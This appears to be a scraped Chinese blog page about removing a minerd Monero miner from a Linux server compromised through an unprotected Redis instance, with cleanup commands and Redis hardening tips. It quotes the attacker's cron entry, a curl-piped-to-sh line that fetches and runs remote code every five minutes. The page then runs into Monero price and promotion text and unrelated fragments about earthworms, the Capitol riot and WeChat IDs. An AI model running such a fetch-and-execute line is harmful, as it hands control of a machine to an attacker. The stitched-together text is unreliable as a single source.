1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
根据行情数据显示,门罗币价值116.1美元,相当于人民币768.15元,历史更高价格为495.83美元,相当于人民币3280.56元,历史更低价格为0.2129美元,相当于人民币1.4086元。2016年门罗币更高价格14.0944美元,2017年门罗币更高价格469.19美元,2018年门罗币更高价格459.33美元,2019年门罗币更高价格117.41美元,2020年门罗币更高价格135.8美元。
XMR门罗币,匿名三剑客之一,继大饼之后的暗网之王。独创的环形签名技术曾独步币圈无人能及(现在有了更强大的零知识证明技术)。在大多数项目都在支持ASIC矿机或保持中立不同,其项目团队从一开始就是非常抵触ASIC矿机挖矿,甚至不惜多次硬分叉来对抗ASIC矿机,结果就是分裂出多个分叉币,并计划于今年10月部署新的RandomX”算法来继续对抗 ASIC矿机。可以说是现在比较少的算力去中心化的项目了。但是缺点是由于可以通过cpu挖矿,导致门罗币非常受到黑客的喜爱,经常会出现病毒劫持电脑给黑客挖矿的事件,也算是有利就有弊吧。
不能的
门罗币通过自动将保密技术应用到每一笔交易来解决这些隐私问题。你可以放心你不可能拥有“受污染”的门罗币。这是一个经济学概念,称为“可互换性”,在历史上被认为是所有货币的一个重要特征
蚯蚓吃什么(水里的鱼类,为啥爱吃蚯蚓?) 钓鱼作为一个户外运动,受到越来越多的人喜爱 钓鱼作为一项户外运动,受到很多人的喜爱,每当闲暇下来,或...
本文导读目录: 1、ps做黑客帝国数字雨,要静态图片 2、求黑客帝国数字雨的制作方法 3、谁帮我弄个黑客帝国数字雨呀,我想要是010101010101010的,没字母的,求助大家 4、屏幕...
美国首都华盛顿6日下午发生美国政治史上罕见一幕。大批特朗普支持者闯入国会大厦,正在举行的认证大选结果的参众两院联席会议被迫中断,世界再次目睹美国政治乱象。 闹剧暴露了美国社会哪些深层问题?拜...
最近表妹在微信上跟我吐槽:“工作遥遥无期,每天在家又闲得发慌,真是好烦啊!” 我说:“表妹啊,虽然你在家很闲,老板给你开工资,但是公司可不是慈善机构,不可能一直给你开工资,万一哪天你公司破产了,或者...
如果你对 UnionId、OpenId、wxopenid这三个概念傻傻分不清,那看这篇文章就对了。了解微信账户体系,能帮助你更好地做小程序设计。 01 概念解释 1. 小程序OpenId OpenI...
本文目录一览: 1、中国最有影响力的黑客是谁? 2、目前中国顶尖黑客是谁? 3、中国十大黑客排名是什么?有什么事迹? 4、中国最厉害的黑客是谁? 中国最有影响力的黑客是谁? 中国有影响力...